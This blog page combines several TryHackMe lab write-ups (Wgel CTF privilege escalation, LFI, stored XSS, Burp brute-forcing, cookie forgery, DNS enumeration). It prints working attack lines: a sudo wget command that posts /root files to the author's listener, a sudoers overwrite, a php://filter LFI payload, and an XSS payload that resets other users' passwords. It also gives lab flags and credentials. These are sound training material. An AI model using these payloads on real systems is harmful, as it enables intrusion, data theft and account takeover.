TryHackMe Wgel CTF Exfiltrate the root flag

Wgel CTF is a TryHackMe machine, after listing the website we found a private key that gave us SSH access. We escalate privileges by modifying the sudoers file with Wget.


First we start with NMAP tool. TCP port scan, we see two open ports http (80) and ssh (22).

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo nmap -O 10.10.56.251                        
[sudo] password for hackerboy: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 23:49 IST
Nmap scan report for 10.10.56.251
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/28%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=64C406D
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=A)SEQ(SP=1
OS:05%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O
OS:3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.04 seconds
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

HTTP

Apache is running on port 80. 

GOBUSTER

Directory and file scanning with gobuster.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/ -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 
/.html                (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11374]
/index.html           (Status: 200) [Size: 11374]
/server-status        (Status: 403) [Size: 277]
/sitemap              (Status: 301) [Size: 314] [--> http://10.10.56.251/sitemap/]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$

Page web and /sitemap/

 Again we do a scan with gobuster but now to the page we found ( /sitemap/). 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/sitemap -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 

/.htpasswd.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.56.251/sitemap/.ssh/]
/about.html           (Status: 200) [Size: 12232]
/blog.html            (Status: 200) [Size: 12745]
/contact.html         (Status: 200) [Size: 10346]
/css                  (Status: 301) [Size: 318] [--> http://10.10.56.251/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.56.251/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.56.251/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 317] [--> http://10.10.56.251/sitemap/js/]
/services.html        (Status: 200) [Size: 10131]
/shop.html            (Status: 200) [Size: 17257]
/work.html            (Status: 200) [Size: 11428]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

SSH - Jessie

We start session with Jessieand the private key we found earlier, we get an ssh shell and our first flag user_flag.txt .

An id_rsa key can be used as an alternative method to log into SSH. Meaning, we do not need a password! Maybe we can try this against the Jessie user found earlier?

Initial Access

Download the id_rsa key from the webserver with wget:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ wget http://10.10.56.251/sitemap/.ssh/id_rsa -O ./id_rsa.txt                                            
--2023-07-29 01:22:03--  http://10.10.56.251/sitemap/.ssh/id_rsa
Connecting to 10.10.56.251:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K)
Saving to: ‘./id_rsa.txt’

./id_rsa.txt                              100%[=====================================================================================>]   1.64K  --.-KB/s    in 0s      

2023-07-29 01:22:03 (43.1 MB/s) - ‘./id_rsa.txt’ saved [1675/1675]

                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

Now login as Jessie:

$ chmod 600 id_rsa.txt
$ sudo chown hackerboy:hackerboy id_rsa.txt
$ ssh jessie@10.10.56.251 -i id_rsa.txt

 

Privilege Escalation

Next, we need to read the root user flag. In order to do so, we need root privileges.

A good first check is to run sudo -l to list what we can run as root:

Click on this link to learn about sudo -l (all about enumeration) - CLICK HERE

 There are two entries here: (1) we can run all commands as root, but need to know Jessie’s password, and (2) we can run wget as root.

According to the amazing GTFOBins repo we can use wget to read files. We’ll use this technique to read the root user’s flag:

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.22.119:4545

# This is our system IP 10.9.22.119

# we will same port from both side 4545

Netcat listener

nc  -lvp 4545

Root flag - b1b968b37519ad1daa6408188649263d

And in the wgel machine we execute the wget command with sudo which will overwrite the file /etc/sudoers.

We are located in the folder /etc/and we execute:

sudo /usr/bin/wget 10.9.22.119:4545/sudoers --output-document=sudoers

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Get started with Cyber Security in 25 days, by learning the basics and completing a new, beginner friendly security exercise every day leading up until Christmas; an advent calendar but with security challenges and not chocolate.


Hey Guys! Sorry for the delay but, we are back with Day 6 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the Day 5 challenge click here.


This challenge is again based on Web Exploitation and the task is named

Patch Management is Hard

DAY 6

Story


During a routine security audit before the Incident, McSkidy discovered some recovery passwords on an old server. She created a ticket to decommission this server to reduce this security vulnerability. The Elf assigned to fix this vulnerability kept pushing off the task, and this never got done. Luckily, some of those recovery keys can be used to save some systems.

Unfortunately, the only way to access the server is through an old web application. See if you can pull out those recovery keys to help McSkidy with her pursuit to save Christmas.



Learning Objectives of the day

1.     What is LFI?
2.     How to perform LFI?
3.     How to elevate from LFI to RCE?

Let us understand the concepts targeted for today first!

What is LFI?

An LFI vulnerability is found in various web applications. As an example, in the PHP, the following functions cause this kind of vulnerability:

1.     include
2.     require
3.     include_once
4.     require_once

    
    

It is a web application vulnerability that allows the attacker to include and read local files on the server. These files could contain sensitive data such as cryptographic keys, databases that contain passwords, and other private data. An LFI vulnerability happens due to a developer’s lack of security awareness. In some cases, developers need to include the content of other local files within a specific page. Suppose a developer includes files without proper input validation. In that case, the LFI vulnerability will exist as a developer should never trust user input and keep all inputs from users to be filtered and sanitized. The main issue of these vulnerabilities is the lack of input validation, in which the user inputs are not sanitized or validated, and the user controls them.


You should read the content given with the challenge for the best understanding of LFI



Q1.Deploy the attached VM and look around. What is the entry point for our web application?

Ans :- err

Q2.Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

We first go to our entry point and replace the error.txt file with ‘/etc/passwd’ file just to check if we can get it!

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false 

Yes we have access, but normally we shouldn’t have that!

Now we check for /etc/flag and voila!

Ans :- THM{d29e08941cf7fe41df55f1a7da6c4c06}

Q3.Use the PHP filter technique to read the source code of the index.php. What is the $flag variable’s value?

We use the PHP filter technique to read the code for index.php by using :

php://filter/convert.base64-encode/resource=

https://10-10-247-133.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=index.php

Once we find the base64 encoding for it, we go to https://www.base64decode.org/ and decode it for our answer!

Or

You can use the base64 command in terminal...


echo "aplhanumeric character" | base64 -d

echo "PD9waHAgc2Vzc2lvbl9zdGFydCgpOwokZmxhZyA9ICJUSE17NzkxZDQzZDQ2MDE4YTBkODkzNjFkYmY2MGQ1ZDllYjh9IjsKaW5jbHVkZSgiLi9pbmNsdWRlcy9jcmVkcy5waHAiKTsKaWYoJF9TRVNTSU9OWyd1c2VybmFtZSddID09PSAkVVNFUil7ICAgICAgICAgICAgICAgICAgICAgICAgCgloZWFkZXIoICdMb2NhdGlvbjogbWFuYWdlLnBocCcgKTsKCWRpZSgpOwp9IGVsc2UgewoJJGxhYk51bSA9ICIiOwogIHJlcXVpcmUgIi4vaW5jbHVkZXMvaGVhZGVyLnBocCI7Cj8+CjxkaXYgY2xhc3M9InJvdyI+CiAgPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4KICA8L2Rpdj4KICA8ZGl2IGNsYXNzPSJjb2wtbGctOCBjb2wtb2Zmc2V0LTEiPgogICAgICA8P3BocCBpZiAoaXNzZXQoJGVycm9yKSkgeyA/PgogICAgICAgICAgPHNwYW4gY2xhc3M9InRleHQgdGV4dC1kYW5nZXIiPjxiPjw/cGhwIGVjaG8gJGVycm9yOyA/PjwvYj48L3NwYW4+CiAgICAgIDw/cGhwIH0KCj8+CiA8cD5XZWxjb21lIDw/cGhwIGVjaG8gZ2V0VXNlck5hbWUoKTsgPz48L3A+Cgk8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1kYW5nZXIiIHJvbGU9ImFsZXJ0Ij5UaGlzIHNlcnZlciBoYXMgc2Vuc2l0aXZlIGluZm9ybWF0aW9uLiBOb3RlIEFsbCBhY3Rpb25zIHRvIHRoaXMgc2VydmVyIGFyZSBsb2dnZWQgaW4hPC9kaXY+IAoJPC9kaXY+Cjw/cGhwIGlmKCRlcnJJbmNsdWRlKXsgaW5jbHVkZSgkX0dFVFsnZXJyJ10pO30gPz4KPC9kaXY+Cgo8P3BocAp9Cj8+</div>" | base64 -d

Answer :-  THM{791d43d46018a0d89361dbf60d5d9eb8}

Q4.McSkidy forgot his login credential. Can you help him to login in order to recover one of the server’s passwords?

Now that you read the index.php, there is a login credential PHP file’s path. Use the PHP filter technique to read its content. What are the username and password?

Using the same base64 encoding of index.php file, we also see that there is ./includes/creds.php which has the credentials.

https://10-10-231-193.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php

We do the same process and use the PHP filter process to go to this file and then decode it and get the credentials!

Answer:- McSkidy:A0C315Aw3s0m

Q5.Use the credentials to login into the web application. Help McSkidy to recover the server’s password. What is the password of the flag.thm.aoc server?

We have the username and password, we login and we see a fe options!

We know we have to recover the password, so we go on password recovery

Answer:- THM{552f313b52e3c3dbf5257d8c6db7f6f1}

Q6.The web application logs all users’ requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

We send in a CURL command in order to test the logs and see how it shows.


curl -A "TESTIN TESTING" http://10-10-88-123.p.thmlabs.com/login.php

the “-A” option helps us set the User Agent and we see TESTIN TESTING as user agent


Now, we do the same, instead with a little php payload to display the phpinfo!

Now to check the log file we need to go to “./includes/logs/app_access.log”, but, for that, we need to go to another window where we a re not logged in to actually check it!

And we see the PHP info file in the logs!!!!!

We can see the hostname directly in the phpinfo in the System column

Answer:- lfi-aoc-awesome-59aedca683fff9261263bb084880c965


The question does ask for RCE, but the this task can be completed without RCE!

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

We are back with Day 5 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the Previous Day challenge click here.

This challenge is again based on Web Exploitation and the task is named Pesky Elf Forum. TryHackMe Web Exploitation Pesky Elf Forum XSS

Learning Objectives:

• What is an XSS vulnerability?
• What Types of XSS vulnerabilities are there?
• Challenge Walkthrough.

What is an XSS vulnerability?


Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users.


If you can get JavaScript to run on a victim’s computer, there are numerous things you can achieve. This can range from stealing the victim’s cookies to take over their session, running a keylogger that will log every key the user presses on their keyboard while visiting the website, redirecting the user to a totally different website altogether or performing some kind of action on the website such as placing an order, or resetting their password etc.

What types of XSS vulnerabilities are there?

1. DOM
2. Reflected
3. Stored
4. Blind

Let’s Get Started..

1. What flag did you get when you disabled the plugin?

Login using Username: McSkidy Password: password

Leave a comment on any post as Follow <a href="https://www.kumaratuljaiswal.in">kumaratuljaiswal.in</a>


 

Once your comment is posted, you’ll see that the word ‘kumaratuljaiswal.in’ has been underlined.

This means the comment is reflected as you wrote it without the underline HTML tags being stripped out. As this isn’t being stripped out, you can try the HTML script tags instead to see if the website will run any JavaScript that is entered.



Using the URL, you found earlier for changing the user’s password, you can try the following payload:


<script>fetch('/settings?new_password=pass123');</script>

 

The <script> tag tells the browser we want to run some JavaScript, and the fetch command makes a network request to the specified URL.

After posting the above as a comment, you could view the webpage source to see whether it has been shown correctly. The screenshot below shows us that the script tags aren’t being stripped out or disabled and, in fact, are working:


 

Now that we have this XSS running on the forum, it means that any logged in users viewing the thread will automatically have their password changed to pass123. So let’s log out and see if the Grinch has visited the thread by trying to log in as them (It may take up to a minute before the Grinch visits the page and their password changes).

Username: grinch

Password: pass123

Once logged in, go to the settings page again, and this time, you’ll discover another feature with the option to disable the Christmas to Buttmas plugin.


 

Disable the plugin, and you’ll be awarded a flag.

Done :-)

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Story

McSysAdmin managed to reset everyone’s access except Santa’s! Santa’s expected some urgent travel itinerary for his route over Christmas. Rumour has it that Santa never followed the password security recommendations. Can you use bruteforcing to help him access his accounts?
Learning Objectives of the day

1. Understanding authentication and where it is used
2. Understanding what fuzzing is
3. Understanding what Burp Suite is and how we can use it for fuzzing a login form to gain access
4. Apply this knowledge to retrieve Santa’s travel itinerary

Let us understand the concepts targeted for today first!


What is authentication, and where is it Used?

Authentication is the process of verifying a user’s identity, establishing that they are who they say they are. Authentication can be proven using a variety of authentication means, including:

• A known set of credentials to the server and user such as a username and password
• Token authentication (these are unique pieces of encrypted text)
• Biometric authentication (fingerprints, retina data, etc.)

Authentication is often used interchangeably with authorisation, but it is very different. Authorisation is a term for the rules defining what an authenticated user can and cannot access.

What is Fuzzing?

Put simply, fuzzing is an automated means of testing an element of a web application until the application gives a vulnerability or valuable information. When we are fuzzing, we provide information as we would typically when interacting with it, just at a much faster rate. This means that we can use extensive lists known as wordlists to test a web application’s response to various information.
 

Steps to Fuzz with Burp Suite

Let’s launch FireFox by navigating to “Applications -> Internet-> Firefox”

avigate to the login form in the web browser using the vulnerable IP address (http://MACHINE_IP) (note that the IP address in the screenshots is only an example, you will need to replace this with the MACHINE_IP)

And press “Intercept On” in “Proxy -> Intercept”

Now we will need to return to our Firefox Browser and enable the FoxyProxy extension in Firefox. You can do this by pressing the “FoxyProxy” extension and pressing “Burp”

Submit some dummy data on the login form

Let’s launch Burp Suite by navigating to “Applications -> Other -> Burp Suite”

Navigate to the “Proxy” tab

We will need to return to Burp Suite, where we will see some data has now been returned to us. Right-click the window containing the data and press “Send to Intruder”
    
    

 
Navigate to the “Intruder” tab

10.1. Click the “Positions” tab and clear the pre-selected positions by pressing “Clear $”

10.2. Add the value of the “username” parameter as the first position, sometimes we will already know the username, other times we will not. We can tell Burp to use a wordlist of usernames for this position as well. However, as the username is already known (i.e. cmnatic), we are just brute-forcing the password. (this can be done by highlighting the password parameter and clicking “Add $”)

10.3. Add the “password” value as the position (i.e. password123) (this can be done by highlighting the value in the password parameter and clicking “Add $”)

 
10.4. Select “Cluster Bomb” in the Attack type in the dropdown menu.

10.5. We will now need to provide some values for Burp Suite to fuzz the login form with passwords. We can provide a list manually, or we can provide a wordlist. I will be providing a wordlist.

11. Now after selecting our wordlist, we can see that some passwords have filled the “Payload Options” window

12. Now let’s press the “Start Attack” button, this will begin fuzzing the login form. Look at the results and sort by “Length”. Unsuccessful passwords will return a certain length, and successful passwords will return another length.

Now that we understand how to use Burp Suite, we can create our own attacks and complete the challenge!

Q1. What valid password can you use to access the “santa” account?

Follow the steps mentioned above and create your own attack.

If you read the challenge properly, the link for the wordlist is given there already.

Use this wordlist for your attack and select the Cluster attack for this challenge.

Navigate to the vulnerable login form at http://10.10.205.31/ and apply the material for

today's task to login to Santa's itinerary, using the username as "santa" and the password

list located at /root/Rooms/AoC3/Day4/passwords.txt on the TryHackMe AttackBox (or download

it from here for your payload.

Q2. What is the flag in Santa’s itinerary?

Once you have logged in from the login panel, you get the flag!!

Answer - THM{SANTA_DELIVERS}


 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Story

McSkidy needs to check if any other employee elves have left/been affected by Grinch Industries attack, but the systems that hold the employee information have been hacked. Can you hack them back to determine if the other teams in the Best Festival Company have been affected?



Learning Objectives of Day 2:
 

• Understanding the underlying technology of web servers and how the web communicates.
• Understand what cookies are and their purpose.
• Learn how to manipulate and manage cookies for malicious use.

Let us understand the concepts targeted for today first!

HTTP(S)

he HTTP protocol is a client-server protocol to provide communication between a client and a webserver. HTTP requests are similar to a standard TCP network request; however, HTTP adds specific headers to the request to identify the protocol and other information.

When an HTTP request is crafted, the method and target header will always be included. The target header will specify what to retrieve from the server, and the method header will specify how.

When retrieving information from a web server, it is common to use the GET method, such as loading a picture.

When sending data to a web server, it is common to use the POST method, such as sending login information.

Example Request

GET / HTTP/1.1
Host: tryhackme.com
User-Agent: Mozilla/5.0 Firefox/87.0
Referer: https://tryhackme.com/

Example Response

HTTP/1.1 200 OK
Server: nginx/1.15.8
Date: Wednesday, 24 Nov 2021 13:34:03 GMT
Content-Type: text/html
Content-Length: 98

Cookies

Cookies are tiny pieces of data (metadata) or information locally stored on your computer that are sent to the server when you make a request.

Cookies can be assigned any name and any value allowing the webserver to store any information it wants. Today we will be focusing on authentication cookies, also known as session cookies. Authentication or session cookies are used to identify you and what access level is attached to your session.

Cookie Manipulation

Cookie manipulation is taking a cookie and modifying it to obtain unintended behavior determined by the web developer. Cookie manipulation is possible because cookies are stored locally on your host system, meaning you have complete control over them and modify them as you please.

To begin modifying and manipulating cookies, we need to open our developer tools. In Google Chrome, developer tools are known as the “Chrome Developer Tools,” and in Mozilla Firefox, they are known as the “Firefox Developer Tools.”

Developer tools can be accessed by pressing F12 or Ctrl+Shift+I. Once developer tools are open, to access your cookies, navigate to the Storage tab in Firefox or Application tab in Chrome/Edge; select the Cookies dropdown on the left-hand side of the console.

Now that we understand these basic terms and concepts! Lets Enumerate!!

Q1. What is the name of the new cookie that was created for your account?

Once you open the website from the given link, you have to register an account.

    


    Welcome To Advent of Cyber!

 

Then open the developer options and check for the cookie and find out the cookie name

Answer: user-auth

Q2. What encoding type was used for the cookie value?

If you notice the value of the cookie that was generated,it is alphanumeric with more of numbers and less of alphabets.

Mostly all these alphabets are between “a” and “f” and we know only kind of encoding that is this way which is


Answer: Hexadeciaml

Q3. What object format is the data of the cookie stored in?

We can see that the value of the cookie is encoded so we need to go and get the value decoded.

We can do this by going onto CyberChef and inputting our cookie value. We convert it from hex so we get our output

From the image we can clearly see that the data is stored in key-value pairs and that is why it is called

Answer: JSON

Now we need to manipulate the cookie to get Admin access!!

Now copy the json output and set it as the input for this conversion in CyberChef tool. Select the option of “ To Hex” and set the delimiter as none so as to avoid all the spaces that come with it.

Once we do that, we have the value of the same json with user as “admin”

Q4. What is the value of the administrator cookie? (username = admin)


Ans :-

 7b636f6d70616e793a2022546865204265737420466573746976616c20436f6d70616e79222c206973726567697374657265643a2254727565222c20757365726e616d653a2261646d696e227d

You can also decode this hex value via terminal through this command 

echo " 7b636f6d70616e793a2022546865204265737420466573746976616c20436f6d70616e79222c206973726567697374657265643a2254727565222c20757365726e616d653a2261646d696e227d" | xxd -r -p

We have the value of the admin login cookie, so we go back to our page and edit the value of the cookie into this new value for admin login.

and Voila!!

We are now Admin!!

Q5. What team environment is not responding?


Ans :- HR



Q6. What team environment has a network warning?


Ans :- Application

All answer done :-)

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Dig Dug DNS Server Enumeration

Turns out this machine is a DNS server - it's time to get your shovels out


Oooh, turns out, this 10.10.5.208 machine is also a DNS server! If we could dig into it, I am sure we could find some interesting records! But... it seems weird, this only responds to a special type of request for a givemetheflag.com domain?
 

Use some common DNS enumeration tools installed on the AttackBox to get the DNS server on 10.10.5.208 to respond with the flag.

Click on the link below -

DNS in detail

Dig in Networking 

WHOIS in Networking 

CEHv10 DNS

 
Passive Reconnaissance
DNS Manipulation

First, it is worth checking what ports are open on the machine. but we will jump into directly dns enumeration. If you wanna dns enumeration with dnspython then you can do it but first we will dns tool in linux after that we will make a DNS tool with the help of python programming language.

Dig

Dig is a versatile DNS lookup utility that can query domain name server records. Using Dig, we can get the flag by specifying the name server (target host’s address), the domain name, and A at the end to establish we are looking for the A record.


When you visit a website in your web browser this all happens automatically, but we can also do it manually with a tool called dig . Like ping and traceroute, dig should be installed automatically on Linux systems.


Dig allows us to manually query recursive DNS servers of our choice for information about domains:
dig <domain> @<dns-server-ip>

It is a very useful tool for network troubleshooting.


 

dig @10.10.5.208 givemetheflag.com A 

nslookup

nslookup is another tool excellent for query domain name servers. Using the target host IP as the DNS server, we can query the A record to get the flag.


 

  
  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python]
└─$ nslookup -type=A givemetheflag.com 10.10.5.208                                                                                                                  1 ⨯
Server:         10.10.5.208
Address:        10.10.5.208#53

givemetheflag.com       text = "flag{0767ccd06e79853318f25aeb08ff83e2}"

                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python]
└─$ 
  

DNS in python 

dnspython is a DNS toolkit for Python. It supports almost all record types. It can be used for queries, zone transfers, and dynamic updates. It supports TSIG authenticated messages and EDNS0.

dnspython provides both high and low level access to DNS. The high level classes perform queries for data of a given name, type, and class, and return an answer set. The low level classes allow direct manipulation of DNS zones, messages, names, and records.

 

┌──(test)─(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python]
└─$ cat dns-find.py                                                                                                                                                 1 ⨯
#!/usr/bin/python
#import dnspython as dns
import dns
#import dns.resolver
from dns import resolver

#result = dns.resovler.query('hackingtruth.org', 'A')

result = dns.resolver.resolve('google.com', 'A')
for ipval in result:
    print('IP', ipval.to_text())
                                                                                                                                                                        
┌──(test)─(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python]
└─$ 

Disclaimer